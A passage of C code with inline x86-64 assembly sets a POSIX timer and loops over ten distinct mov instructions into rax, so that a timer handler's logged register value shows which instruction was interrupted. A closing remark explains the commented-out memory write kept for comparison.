timer_create(CLOCK_MONOTONIC, NULL, &timerid);
timer_settime(timerid, 0, &its, NULL);
// Run a loop to generate some activity
volatile int i;
while (1) {
__asm__ volatile (
"mov $1, %%rax\n\t" // Move 1 to rax
"mov $2, %%rax\n\t" // Move 2 to rax
"mov $3, %%rax\n\t" // Move 3 to rax
"mov $4, %%rax\n\t" // Move 4 to rax
"mov $5, %%rax\n\t" // Move 5 to rax
"mov $6, %%rax\n\t" // Move 6 to rax
"mov $7, %%rax\n\t" // Move 7 to rax
"mov $8, %%rax\n\t" // Move 8 to rax
"mov $9, %%rax\n\t" // Move 9 to rax
"mov $10, %%rax\n\t" // Move 10 to rax
: // No output operand
: // No input operand
: "%rax" // Clobbered register
);
//i = -1; /* 内存写操作 */
}
return 0;
}
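Because each mov loads a distinct constant into rax, the rax value logged by the handler pinpoints which of the ten instructions the timer interrupted; re-enabling the commented-out i = -1 store allows comparing against a loop that also writes memory.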